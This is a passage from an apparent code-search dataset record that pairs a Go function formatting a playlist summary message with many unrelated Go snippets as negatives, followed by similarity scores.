{\n\t\t\tignore = !ignore\n\t\t\tcontinue\n\t\t} else if r == '!' {\n\t\t\tignore = !ignore\n\t\t} else if r == '<' && !garbage {\n\t\t\tgarbage = !garbage\n\t\t} else if r == '>' {\n\t\t\tgarbage = !garbage\n\t\t} else if r == '{' && !garbage {\n\t\t\tgroupScore++\n\t\t} else if r == '}' && !garbage {\n\t\t\ttotalScore += groupScore\n\t\t\tgroupScore--\n\t\t} else if garbage {\n\t\t\tallGarbage++\n\t\t}\n\t}\n\n\treturn totalScore, allGarbage\n}", "func CountI(s, substr string) int {\n\treturn strings.Count(ToLower(s), ToLower(substr))\n}", "func CountWordsPerSentence(sentences []string) map[string]int {\n\tresult := make(map[string]int)\n\tfor _, sentence := range sentences {\n\t\twords := strings.Split(sentence, \" \")\n\t\tif len(words) == 1 && words[0] == \"\" {\n\t\t\tresult[sentence] = 0\n\t\t\tcontinue\n\t\t}\n\t\tresult[sentence] = len(words)\n\t}\n\n\treturn result\n}", "func main() {\n\t// 获取命令行文件名\n\tfilename := os.Args[1]\n\n\tcontents, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\tfmt.Println(\"打开文件出错\", err)\n\t}\n\n\ttext := string(contents)\n\tfmt.Println(text)\n\tfmt.Println(words.CountWords(text))\n}", "func countCharsSlow(s string, want int) int {\n\tchars := strings.Split(s, \"\")\n\n\tfor _, c := range chars {\n\t\tif count := strings.Count(s, c); count == want {\n\t\t\treturn 1\n\t\t}\n\t}\n\n\treturn 0\n}", "func LengthOfLastWord(s string) int {\n\tstrArr := strings.Split(s, \" \")\n\ti := 1\n\tl := 0\n\tfor {\n\t\tif i > len(strArr) {\n\t\t\tbreak\n\t\t}\n\t\tif len(strArr[len(strArr)-i]) == 0 {\n\t\t\ti++\n\t\t} else {\n\t\t\tl = len(strArr[len(strArr)-i])\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn l\n}", "func main() {\n\tfmt.Println(countByte(\"asSASA ddd dsjkdsjs dk\"))\n\tfmt.Println(countByte(\"asSASA ddd dsjkdsjsこん dk\"))\n}", "func CountUniqueCharacters(str string) int {\n\tcounter := make(map[int32]int)\n\n\tfor _, value := range str {\n\t\tcounter[value]++\n\t}\n\n\treturn len(counter)\n}", "func FindShort(s string) int {\n\tstrSplit := strings.Split(s, \" \")\n\tans := len(strSplit[0])\n\tfor _, v := range strSplit {\n\t\tif ans > len(v) {\n\t\t\tans = len(v)\n\t\t}\n\t}\n\treturn ans\n}", "func (cat *Category) GetTokenCount(word string) int {\n\tif val, ok := cat.Tokens[word]; ok {\n\t\treturn val\n\t}\n\treturn 0\n}", "func Score(s string) int {\n\tcount := 0\n\tfor _, r := range strings.ToUpper(s) {\n\t\tcount += letterValue[r]\n\t}\n\n\treturn count\n}", "func countingValleys(n int32, s string) int32 {\n depth := 0\n valley := 0\n for i := 0; int32(i) < n; i++ {\n if s[i] == 'U' {\n depth++\n }\n if s[i] == 'D' {\n depth--\n }\n\n if depth == 0 && s[i] == 'U' {\n valley++\n }\n }\n return int32(valley)\n}", "func extractLineCount(s string) int {\n\ts = strings.TrimPrefix(s, \"-\")\n\ts = strings.TrimSpace(s)\n\n\tif i, err := strconv.ParseInt(s, 10, 0); err != nil {\n\t\treturn 0\n\t} else {\n\t\treturn int(i)\n\t}\n}", "func NewWordCount() WordCount {\n\treturn WordCount{\n\t\tminer: miner{\"wordcount\"},\n\t\twords: map[string]int{},\n\t}\n}", "func Score(word string) int {\n\tscore := 0\n\n\tfor _, r := range word {\n\t\tscore += processLetter(unicode.ToUpper(r))\n\t}\n\treturn score\n}" ]
[ "0.8152074", "0.786732", "0.7695024", "0.76229674", "0.7579374", "0.7573733", "0.7568007", "0.7443229", "0.7417735", "0.73966706", "0.7394571", "0.73839414", "0.7369776", "0.73424536", "0.73072755", "0.72797334", "0.72493136", "0.71997625", "0.71941465", "0.7190947", "0.7186641", "0.707964", "0.70699555", "0.70225215", "0.7019846", "0.69380766", "0.6919332", "0.68585384", "0.6856201", "0.6780203", "0.67504454", "0.6629433", "0.65736777", "0.65585196", "0.652245", "0.6443757", "0.6438023", "0.64292085", "0.6395695", "0.6363178", "0.6355642", "0.6337122", "0.6300736", "0.6257695", "0.62181765", "0.6194123", "0.6153831", "0.6068036", "0.6062526", "0.60373205", "0.6036926", "0.6015196", "0.5997219", "0.5991255", "0.59606415", "0.59249824", "0.59221715", "0.5909636", "0.58987975", "0.58892405", "0.58859736", "0.5879935", "0.58569205", "0.58347875", "0.58335567", "0.58330774", "0.58320445", "0.5797854", "0.57922435", "0.5785858", "0.57857674", "0.57614124", "0.5723564", "0.57084227", "0.56789035", "0.56789035", "0.56789035", "0.5678423", "0.5669202", "0.5666139", "0.56536376", "0.56507", "0.5642127", "0.5600125", "0.5592324", "0.55759996", "0.5574697", "0.55519116", "0.55484307", "0.55420935", "0.5540904", "0.5521872", "0.5508267", "0.54977137", "0.54582983", "0.5437422", "0.542103", "0.541644", "0.5409411" ]
0.6873758
28
FormatDiscoveryMessage returns string reparesentation of Playlist Summary
func FormatDiscoveryMessage(summary *types.PlaylistTracksSummary) string { builder := &strings.Builder{} builder.WriteString(fmt.Sprintf("Playlist '%v' summary:\n", summary.Name)) for i, t := range summary.Tracks { str := fmt.Sprintf("#%v. [%v - %v](%v)\n", i+1, t.Artist, t.Name, t.Link) builder.WriteString(str) } return builder.String() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func discover(logger *zap.Logger, overlay *kademlia.Protocol) string {\n\tids := overlay.Discover()\n\n\tvar str []string\n\tvar info string\n\tfor _, id := range ids {\n\t\tstr = append(str, fmt.Sprintf(\"%s(%s)\", id.Address, id.PubKey.String()[:PrintedLength]))\n\t}\n\n\tif len(ids) > 0 {\n\t\tlogger.Info(fmt.Sprintf(\"Discovered %d peer(s)\", len(ids)),\n\t\t\tzap.String(\"detail\", strings.Join(str, \", \")),\n\t\t)\n\t\tinfo = fmt.Sprintf(`{\"discovered_peers\":%d,\"detail\":\"%s\"}`, len(ids), strings.Join(str, \",\"))\n\t} else {\n\t\tlogger.Error(\"Did not discover any peers.\")\n\t\tinfo = `{\"discovered_peers\":0,\"detail\":\"\"}`\n\t}\n\treturn info\n}", "func (p *protocol) DiscoveryID(chanID int) string {\n\treturn fmt.Sprintf(\"/pcp/%d/%d\", p.TimeSlotStart().UnixNano(), chanID)\n}", "func (s ServiceDiscovery) String() string {\n\treturn awsutil.Prettify(s)\n}", "func descriptionContents(shuffledData *ClipJSON) string {\n\tcontents := `\\n\\n` // Start with new line to seperate message at top\n\tcurrentTime := 0\n\n\tfor _, clip := range shuffledData.Clips {\n\t\tcontents += fmt.Sprintf(\"Title: %s\\nVod: %s\\nTime: %s\\n\\n\", clip.Title, clip.Vod.URL, youtubeTimify(currentTime))\n\t\t// Convert clip.Duration to milliseconds, then round in to the nearest millisecond\n\t\tcurrentTime += int(math.Floor(clip.Duration + 0.5))\n\t}\n\n\treturn contents\n}", "func (s GetDiscoverySummaryOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s GetDiscoverySummaryOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (id StreamingLocatorId) String() string {\n\tcomponents := []string{\n\t\tfmt.Sprintf(\"Subscription: %q\", id.SubscriptionId),\n\t\tfmt.Sprintf(\"Resource Group Name: %q\", id.ResourceGroupName),\n\t\tfmt.Sprintf(\"Media Service Name: %q\", id.MediaServiceName),\n\t\tfmt.Sprintf(\"Streaming Locator Name: %q\", id.StreamingLocatorName),\n\t}\n\treturn fmt.Sprintf(\"Streaming Locator (%s)\", strings.Join(components, \"\\n\"))\n}", "func (s DnsServiceDiscovery) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (m BulkMessage) String() string {\n\tmd, _ := json.Marshal(m.Metadata)\n\tb := strings.Builder{}\n\tb.WriteString(fmt.Sprintf(\"[BulkMessage] topic='%s' metadata=%s entries=%d\", m.Topic, md, len(m.Entries)))\n\tfor i, e := range m.Entries {\n\t\tb.WriteString(fmt.Sprintf(\"\\n%d: \", i))\n\t\tb.WriteString(e.String())\n\t}\n\treturn b.String()\n}", "func (o LookupNoteResultOutput) Discovery() DiscoveryResponseOutput {\n\treturn o.ApplyT(func(v LookupNoteResult) DiscoveryResponse { return v.Discovery }).(DiscoveryResponseOutput)\n}", "func (s Playlist) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (p *peer) Info() string {\n\treturn fmt.Sprintf(\"%s delay %d (%d of %d success, %d of %d fails)\\n\",\n\t\tp.Url, p.Delay, p.Pings, p.Limit, p.Fails, p.Maxfail)\n}", "func (o *Screenrecordingmetadatarequest) String() string {\n \n \n o.MetaData = []Screenrecordingmetadata{{}} \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (m InfoMessage) Format() string {\n\treturn wrapInfo(m.Text)\n}", "func strFormatOut(input *gofeed.Item) string {\n\tvar output string = input.Title + \"\\n\" + input.Link + \"\\n\"\n\treturn output\n}", "func (h aliasMessage) String() string {\n\tswitch h.op {\n\tcase \"list\":\n\t\t// Create a new pretty table with cols configuration\n\t\tt := newPrettyRecord(2,\n\t\t\tRow{\"Alias\", \"Alias\"},\n\t\t\tRow{\"URL\", \"URL\"},\n\t\t\tRow{\"AccessKey\", \"AccessKey\"},\n\t\t\tRow{\"SecretKey\", \"SecretKey\"},\n\t\t\tRow{\"API\", \"API\"},\n\t\t\tRow{\"Path\", \"Path\"},\n\t\t)\n\t\t// Handle deprecated lookup\n\t\tpath := h.Path\n\t\tif path == \"\" {\n\t\t\tpath = h.Lookup\n\t\t}\n\t\treturn t.buildRecord(h.Alias, h.URL, h.AccessKey, h.SecretKey, h.API, path)\n\tcase \"remove\":\n\t\treturn console.Colorize(\"AliasMessage\", \"Removed `\"+h.Alias+\"` successfully.\")\n\tcase \"add\": // add is deprecated\n\t\tfallthrough\n\tcase \"set\":\n\t\treturn console.Colorize(\"AliasMessage\", \"Added `\"+h.Alias+\"` successfully.\")\n\tdefault:\n\t\treturn \"\"\n\t}\n}", "func (req AddToClusterMessage) String() string {\n\treturn \"AddToClusterMessage:{\\nsource:\" + req.Source.String() + \",\\ndest: \" + req.Dest.String() + \",\\nmessage:\" + req.Message + \" }\"\n}", "func (node *PartitionSpec) Format(buf *TrackedBuffer) {\n\tswitch node.Action {\n\tcase ReorganizeAction:\n\t\tbuf.astPrintf(node, \"%s %v into (\", ReorganizeStr, node.Name)\n\t\tvar prefix string\n\t\tfor _, pd := range node.Definitions {\n\t\t\tbuf.astPrintf(node, \"%s%v\", prefix, pd)\n\t\t\tprefix = \", \"\n\t\t}\n\t\tbuf.astPrintf(node, \")\")\n\tdefault:\n\t\tpanic(\"unimplemented\")\n\t}\n}", "func (rl ResolutionList) String() string {\n\tvar sb strings.Builder\n\tfmt.Fprintf(&sb, \"[\")\n\tsep := \"\"\n\tfor _, r := range rl {\n\t\tfmt.Fprintf(&sb, \"%s%s\", sep, r.asString())\n\t\tsep = \", \"\n\t}\n\tfmt.Fprintf(&sb, \"]\")\n\treturn sb.String()\n}", "func (m BulkMessageEntry) String() string {\n\tmd, _ := json.Marshal(m.Metadata)\n\treturn fmt.Sprintf(\"[BulkMessageEntry] entryId='%s' data='%s' content-type='%s' metadata=%s\", m.EntryId, string(m.Event), m.ContentType, md)\n}", "func (m *ChatMessage) GetSummary()(*string) {\n return m.summary\n}", "func (s AwsCloudMapServiceDiscovery) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (h *BotSnack) Descr() string {\n\treturn \"Consumes a botsnack. This pleases mcchunkie and brings balance to the universe.\"\n}", "func (*CMsgGCToClientManageFavoritesResponse) Descriptor() ([]byte, []int) {\n\treturn file_dota_gcmessages_client_proto_rawDescGZIP(), []int{339}\n}", "func formatCmdDisplay(results client.StorageFormatResults, summary bool) (string, error) {\n\tout := &bytes.Buffer{}\n\n\tgroups, mixedGroups, err := groupFormatResults(results, summary)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif len(groups) > 0 {\n\t\tfmt.Fprintf(out, \"\\n%s\\n\", groups)\n\t}\n\n\treturn formatHostGroups(out, mixedGroups), nil\n}", "func (*ListNodePlanningsResponse) Descriptor() ([]byte, []int) {\n\treturn file_alameda_api_v1alpha1_datahub_plannings_services_proto_rawDescGZIP(), []int{15}\n}", "func (*ListNamespacePlanningsResponse) Descriptor() ([]byte, []int) {\n\treturn file_alameda_api_v1alpha1_datahub_plannings_services_proto_rawDescGZIP(), []int{13}\n}", "func ShowQueryingChannelEventsMsgDetail(Status string) {\n\tswitch Status {\n\tcase \"200 OK\":\n\t\tlog.Println(\"Successful query\")\n\tcase \"400 Bad Request\":\n\t\tlog.Println(\"The provided query string is malformed\")\n\tcase \"404 Not Found\":\n\t\tlog.Println(\"The channel does not exist\")\n\tcase \"500 Server Error\":\n\t\tlog.Println(\"Internal Raiden node error\")\n\tcase \"504 TimeOut\":\n\t\tlog.Println(\"No response,timeout\")\n\tdefault:\n\t\tlog.Println(\"Unknown error,QueryingChannelEvents Failure:\", Status)\n\t}\n}", "func (c *Check) String() (string) {\n\tvar s string\n\n\t// Service Status\n\ts = fmt.Sprintf(\"%s:\", c.Status.String())\n\n\t// First line of message\n\tif len(c.message) == 0 {\n\t\ts += \"Message must not be empty!!!\"\n\t\treturn s\n\t}\n\ts += fmt.Sprintf(\" %s\", c.message[0])\n\n\t// Performancedata. Note: Currently all perfdata will be sent in first line\n\tif len(c.perfdata) > 0 {\n\t\ts += \"|\"\n\n\t\tfor _, p := range c.perfdata {\n\t\t\ts += fmt.Sprintf(\"%s \", p.String()) \n\t\t}\n\t\ts = strings.TrimRight(s, \" \")\n\t}\n\n\t// Additional message lines\n\tif len(c.message) > 1 {\n\t\tfor i := 1; i < len(c.message); i++ {\n\t\t\ts += fmt.Sprintf(\"\\n%s\", c.message[i])\n\t\t}\n\t}\n\n\treturn s\n}", "func (s GetDiscoverySummaryInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s GetDiscoverySummaryInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (*WebRTCSDP) Descriptor() ([]byte, []int) {\n\treturn file_signalling_proto_rawDescGZIP(), []int{8}\n}", "func (s ChannelDefinition) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s Song) Details() (string) {\n return fmt.Sprintf(\"Song: %s, Length: %d\", s.Name, s.Length)\n}", "func (s CreateJobPlaylist) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (statsResult *Result) Format() string {\n\tformat := \"\"\n\tformat += fmt.Sprintln(\"Summary:\")\n\tformat += fmt.Sprintf(\"\\tClients:\\t%d\\n\", statsResult.Clients)\n\tformat += fmt.Sprintf(\"\\tParallel calls per client:\\t%d\\n\", statsResult.Parallels)\n\tformat += fmt.Sprintf(\"\\tTotal calls:\\t%d\\n\", statsResult.TotalCalls)\n\tformat += fmt.Sprintf(\"\\tTotal time:\\t%.3fs\\n\", statsResult.TotalTime)\n\tformat += fmt.Sprintf(\"\\tRequests per second:\\t%.3f\\n\", statsResult.RequestsPerSecond)\n\tformat += fmt.Sprintf(\"\\tFastest time for request:\\t%.6fms\\n\", statsResult.FastestTimeForRequest)\n\tformat += fmt.Sprintf(\"\\tAverage time per request:\\t%.6fms\\n\", statsResult.AverageTimePerRequest)\n\tformat += fmt.Sprintf(\"\\tSlowest time for request:\\t%.6fms\\n\\n\", statsResult.SlowestTimeForRequest)\n\tformat += fmt.Sprintln(\"Time:\")\n\tformat += fmt.Sprintf(\"\\t00.0001%%\\ttime for request:\\t%.6fms\\n\", statsResult.N000001thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t00.0010%%\\ttime for request:\\t%.6fms\\n\", statsResult.N000010thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t00.0100%%\\ttime for request:\\t%.6fms\\n\", statsResult.N000100thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t00.1000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N001000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t01.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N010000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t05.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N050000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t10.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N100000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t25.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N250000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t50.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N500000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t75.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N750000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t90.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N900000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t95.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N950000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t99.0000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N990000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t99.9000%%\\ttime for request:\\t%.6fms\\n\", statsResult.N999000thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t99.9900%%\\ttime for request:\\t%.6fms\\n\", statsResult.N999900thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t99.9990%%\\ttime for request:\\t%.6fms\\n\", statsResult.N999990thMillionthTime)\n\tformat += fmt.Sprintf(\"\\t99.9999%%\\ttime for request:\\t%.6fms\\n\\n\", statsResult.N999999thMillionthTime)\n\n\tif statsResult.TotalRequestBodySizes > 0 {\n\t\tformat += fmt.Sprintln(\"Request:\")\n\t\tformat += fmt.Sprintf(\"\\tTotal request body sizes:\\t%d\\n\", statsResult.TotalRequestBodySizes)\n\t\tformat += fmt.Sprintf(\"\\tAverage body size per request:\\t%.2f Byte\\n\", statsResult.AverageBodySizePerRequest)\n\t\tformat += fmt.Sprintf(\"\\tRequest rate per second:\\t%.2f Byte/s (%.2f MByte/s)\\n\\n\", statsResult.RequestRateBytePerSecond, statsResult.RequestRateMBytePerSecond)\n\t}\n\tif statsResult.TotalResponseBodySizes > 0 {\n\t\tformat += fmt.Sprintln(\"Response:\")\n\t\tformat += fmt.Sprintf(\"\\tTotal response body sizes:\\t%d\\n\", statsResult.TotalResponseBodySizes)\n\t\tformat += fmt.Sprintf(\"\\tAverage body size per response:\\t%.2f Byte\\n\", statsResult.AverageBodySizePerResponse)\n\t\tformat += fmt.Sprintf(\"\\tResponse rate per second:\\t%.2f Byte/s (%.2f MByte/s)\\n\\n\", statsResult.ResponseRateBytePerSecond, statsResult.ResponseRateMBytePerSecond)\n\t}\n\tformat += fmt.Sprintln(\"Result:\")\n\tformat += fmt.Sprintf(\"\\tResponse ok:\\t%d (%.3f%%)\\n\", statsResult.ResponseOk, statsResult.ResponseOkPercentile)\n\tformat += fmt.Sprintf(\"\\tErrors:\\t%d (%.3f%%)\\n\", statsResult.Errors, statsResult.ErrorsPercentile)\n\treturn format\n}", "func (p *ubDebugPayload) String() string {\n\treturn fmt.Sprintf(\"[%s][%s][%s][%s]\", formatFlags(p.flags), p.suffix, p.original, p.list)\n}", "func makeDescription(draconResult map[string]string, extras []string) string {\n\tdesc := \"This issue was automatically generated by the Dracon security pipeline.\\n\\n\" +\n\t\t\"*\" + draconResult[\"description\"] + \"*\" + \"\\n\\n\"\n\n\t// Append the extra fields to the description\n\tif len(extras) > 0 {\n\t\tdesc = desc + \"{code:}\" + \"\\n\"\n\t\tfor _, s := range extras {\n\t\t\tdesc = desc + fmt.Sprintf(\"%s: %*s\\n\", s, 25-len(s)+len(draconResult[s]), draconResult[s])\n\t\t}\n\t\tdesc = desc + \"{code}\" + \"\\n\"\n\t}\n\treturn desc\n}", "func (p *DiscoveryProtocol) onDiscoveryResponse(s inet.Stream) {\n\tdata := &api.DiscoveryResponse{}\n\tdecodeProtoMessage(data, s)\n\n\t// Authenticate integrity and authenticity of the message\n\tif valid := authenticateProtoMsg(data, data.DiscoveryMsgData.MessageData); !valid {\n\t\tlog.Println(\"Failed to authenticate message\")\n\t\treturn\n\t}\n\n\tdiscoveryPeer := s.Conn().RemotePeer()\n\tpubKey := data.DiscoveryMsgData.InitHash // TODO: InitHash is a temporary solution for the public key.\n\tlog.Println(\"pubKey: \", pubKey)\n\tp.mu.Lock()\n\tp.NodeIDs[pubKey] = append(p.NodeIDs[pubKey], discoveryPeer.Pretty())\n\tif len(p.NodeIDs[pubKey]) == cap(p.NodeIDs[pubKey]) {\n\t\t// TODO: Return the nodes as an event here\n\t\t// TODO: Remove the key of this map\n\t}\n\tp.mu.Unlock()\n\n\tlog.Printf(\"%s: Received discovery response from %s. Message id:%s. Message: %s.\", s.Conn().LocalPeer(), discoveryPeer, data.DiscoveryMsgData.MessageData.Id, data.Message)\n}", "func (v *Visibilities) Message() string {\n\tvar msg string\n\n\tif len(v.Visibilities) == 0 {\n\t\tmsg = \"No visibilities registered.\"\n\t} else if len(v.Visibilities) == 1 {\n\t\tmsg = \"One visibility registered.\"\n\t} else {\n\t\tmsg = fmt.Sprintf(\"%d visibilities registered.\", len(v.Visibilities))\n\t}\n\n\treturn msg\n}", "func (r *Recommendation) Format() string {\n\tscore := \"Scored\"\n\tif !r.Scored {\n\t\tscore = \"Not Scored\"\n\t}\n\treturn fmt.Sprintf(\"CIS %v - %v (%v)\", r.CisID, r.Name, score)\n}", "func (p *ubPayload) String() string {\n\treturn fmt.Sprintf(\"[%s][%s]\", formatFlags(p.flags), p.suffix)\n}", "func describeNeighbor(nb interface{}) string {\n\tdesc := decoders.MapGetString(nb, \"description\", \"\")\n\tif desc != \"\" {\n\t\treturn desc\n\t}\n\n\taddr := decoders.MapGetString(nb, \"remote_addr\", \"invalid_address\")\n\tasn := decoders.MapGetString(nb, \"remote_as\", \"\")\n\treturn fmt.Sprintf(\"PEER AS%s %s\", asn, addr)\n}", "func convertDiscoverRequestToDnsMsg(request *namingpb.DiscoverRequest, id uint16) (*dns.Msg, error) {\n\tif request == nil {\n\t\treturn nil, model.NewSDKError(model.ErrCodeAPIInvalidArgument, nil, \"invalid namingpb.DiscoverRequest\")\n\t}\n\tdnsReqMsg := dns.Msg{\n\t\tMsgHdr: dns.MsgHdr{\n\t\t\tId: id,\n\t\t\tResponse: false,\n\t\t\tOpcode: dns.OpCodePolarisGetResource,\n\t\t\tAuthoritative: false,\n\t\t\tTruncated: false,\n\t\t\tRecursionDesired: false,\n\t\t\tRecursionAvailable: false,\n\t\t\tZero: false,\n\t\t\tAuthenticatedData: false,\n\t\t\tCheckingDisabled: false,\n\t\t\tRcode: 0,\n\t\t\tQdcount: 1,\n\t\t\tAncount: 0,\n\t\t\tNscount: 0,\n\t\t\tArcount: 0,\n\t\t},\n\t}\n\tquestion := dns.PolarisGetResourceQuestion{\n\t\tBasePolarisQuestion: dns.BasePolarisQuestion{},\n\t\tReq: request,\n\t}\n\tdnsReqMsg.Question = append(dnsReqMsg.Question, &question)\n\treturn &dnsReqMsg, nil\n}", "func (s ChannelSummary) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s AutomatedDiscoveryInformation) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (t TelemetryTalker) String(spacesn string) (result string) {\n\tspaces3 := \" \"\n\tspacesn3 := spacesn + spaces3\n\tspacesn6 := spacesn3 + spaces3\n\tif t.SpoofedStatus != nil {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %t\\n\", spacesn3, \"spoofed-status\", *t.SpoofedStatus)\n\t}\n\tif t.SourcePrefix != nil {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %s\\n\", spacesn3, \"source-prefix\", *t.SourcePrefix)\n\t}\n\tfor k, v := range t.SourcePortRange {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"source-port-range\", k+1)\n\t\tif v.LowerPort != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"lower-port\", *v.LowerPort)\n\t\t}\n\t\tif v.UpperPort != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"upper-port\", *v.UpperPort)\n\t\t}\n\t}\n\tfor k, v := range t.SourceIcmpTypeRange {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"source-icmp-type-range\", k+1)\n\t\tif v.LowerType != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"lower-type\", *v.LowerType)\n\t\t}\n\t\tif v.UpperType != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"upper-type\", *v.UpperType)\n\t\t}\n\t}\n\tfor k, v := range t.TotalAttackTraffic {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"total-attack-traffic\", k+1)\n\t\tresult += v.String(spacesn3)\n\t}\n\tif t.TotalAttackConnection != nil {\n\t\tresult += t.TotalAttackConnection.String(spacesn3)\n\t}\n\treturn\n}", "func (*CMsgGCToClientBattlePassRollupListResponse_EventInfo) Descriptor() ([]byte, []int) {\n\treturn file_dota_gcmessages_client_proto_rawDescGZIP(), []int{227, 0}\n}", "func (s FirewallRuleGroupMetadata) String() string {\n\treturn awsutil.Prettify(s)\n}", "func Info(ctx *dgc.Ctx) *discordgo.MessageEmbed {\n\t// Read the memstats\n\tvar memStats runtime.MemStats\n\truntime.ReadMemStats(&memStats)\n\theapInUse := datasize.ByteSize(memStats.HeapInuse)\n\tstackInUse := datasize.ByteSize(memStats.StackInuse)\n\n\treturn &discordgo.MessageEmbed{\n\t\tTitle: \"Information\",\n\t\tTimestamp: time.Now().Format(time.RFC3339),\n\t\tColor: 0x0893d8,\n\t\tFields: []*discordgo.MessageEmbedField{\n\t\t\t{\n\t\t\t\tName: \"Application\",\n\t\t\t\tValue: \"Mode: `\" + static.Mode + \"`\" +\n\t\t\t\t\t\"\\nVersion: `\" + static.Version + \"`\" +\n\t\t\t\t\t\"\\nUptime: `\" + time.Since(static.StartupTime).Round(time.Second).String() + \"`\",\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"Discord\",\n\t\t\t\tValue: \"Guilds: `\" + strconv.Itoa(len(ctx.Session.State.Guilds)) + \"`\" +\n\t\t\t\t\t\"\\nAPI latency: `\" + ctx.Session.HeartbeatLatency().Round(time.Millisecond).String() + \"`\",\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"System\",\n\t\t\t\tValue: \"OS: `\" + runtime.GOOS + \"`\" +\n\t\t\t\t\t\"\\nArchitecture: `\" + runtime.GOARCH + \"`\" +\n\t\t\t\t\t\"\\nCurrent Goroutines: `\" + strconv.Itoa(runtime.NumGoroutine()) + \"`\" +\n\t\t\t\t\t\"\\nOccupied heap: `\" + heapInUse.HumanReadable() + \"`\" +\n\t\t\t\t\t\"\\nOccupied stack: `\" + stackInUse.HumanReadable() + \"`\",\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"General\",\n\t\t\t\tValue: \"Developer(s): `Lukaesebrot#8001`\" +\n\t\t\t\t\t\"\\nGitHub repository: [here](http://github.com/Lukaesebrot/asterisk)\" +\n\t\t\t\t\t\"\\nInvite me: [here](https://discord.com/api/oauth2/authorize?client_id=\" + static.Self.ID + \"&permissions=0&scope=bot)\" +\n\t\t\t\t\t\"\\nSupport guild: [here](https://discord.gg/ddz9b86)\",\n\t\t\t},\n\t\t},\n\t}\n}", "func (*ListClusterPlanningsResponse) Descriptor() ([]byte, []int) {\n\treturn file_alameda_api_v1alpha1_datahub_plannings_services_proto_rawDescGZIP(), []int{17}\n}", "func (ev *Event) Format(format string) string {\n\treturn fmt.Sprintf(\"Start um %s - Name %s\\n\", ev.Start.Format(\"15:04\"), ev.Name)\n\t//return fmt.Sprintf(\"Start um %s - Name %s\\n%s\\n\", ev.Start.Format(\"15:04\"), ev.Name, ev.Info)\n}", "func generateDiscoveryDoc(apiConfig *endpoints.ApiDescriptor, apiFormat apiFormat) (string, error) {\n\tpath := \"apis/generate/\" + string(apiFormat)\n\tconfig, err := json.Marshal(apiConfig)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\trequestMap := map[string]interface{}{\"config\": string(config)}\n\trequestBody, err := json.Marshal(requestMap)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn dispatchDiscoveryRequest(path, string(requestBody))\n}", "func (cfg *Config) FormatDSN() string {\n\treturn fmt.Sprintf(`%s:%s@%s?env=%s&with=%s&verbose=%s&curr_project=%s&scheme=%s`,\n\t\tcfg.POPAccessID, cfg.POPAccessSecret, cfg.POPURL, encodeJSONB64(cfg.Env),\n\t\tencodeJSONB64(cfg.With), strconv.FormatBool(cfg.Verbose), cfg.Project, cfg.POPScheme)\n}", "func (s *APIImpl) Discovery(ctx echo.Context) error {\n\treturn ctx.JSON(http.StatusOK, &s.metadata)\n}", "func printDistroWatchNews(m map[string]string) string {\n\trelease := parseUrlforStu(m[\"news\"])\n\tvar output string\n\tfor _, thing := range release.Items {\n\t\tif strings.Contains(thing.Title, \"DistroWatch Weekly\") {\n\t\t\toutput += strFormatOut(thing)\n\t\t\toutput += \"\\n\"\n\t\t}\n\t}\n\treturn output\n}", "func (t Talker) String(spacesn string) (result string) {\n\tspaces3 := \" \"\n\tspacesn3 := spacesn + spaces3\n\tspacesn6 := spacesn3 + 